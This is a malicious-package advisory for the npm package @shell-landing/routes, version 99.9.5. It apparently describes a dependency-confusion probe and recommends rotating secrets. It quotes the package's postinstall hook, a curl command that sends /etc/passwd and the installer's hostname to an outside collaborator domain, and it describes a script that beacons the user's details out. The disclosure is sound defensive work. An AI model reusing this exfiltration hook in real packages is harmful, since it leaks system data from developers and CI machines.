npm · Malicious package advisory
Malware@shell-landing/routes
MAL-2026-5429
Malicious code in @shell-landing/routes (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577) On `npm install`, the package's postinstall hook runs `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`. The curl invocation POSTs the contents of `/etc/passwd` to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and beacons each as an HTTP GET subdomain of `*.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the `@shell-landing` scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running `npm install` will leak host identity and `/etc/passwd` to attacker infrastructure.
Compromised versions (1)
- 99.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.